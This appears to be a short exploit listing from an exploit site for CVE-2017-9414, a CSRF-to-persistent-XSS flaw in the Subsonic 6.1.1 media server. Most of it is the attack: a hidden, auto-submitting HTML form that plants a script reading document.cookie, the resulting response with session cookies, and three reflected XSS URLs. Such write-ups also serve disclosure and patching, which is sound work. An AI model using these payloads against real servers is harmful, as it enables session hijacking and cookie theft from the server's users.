Exploit for windows platform in category web applications
[+] Credits: John Page a.k.a hyp3rlinx
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
======================
CSRF - Persistent XSS
CVE Reference:
==============
CVE-2017-9414
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads
if an authenticated user clicks a malicious link or visits an attacker controlled webpage.
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
Then visit http://localhost:4040/index.view
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
Misc Reflected:
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
# 0day.today [2018-01-04] #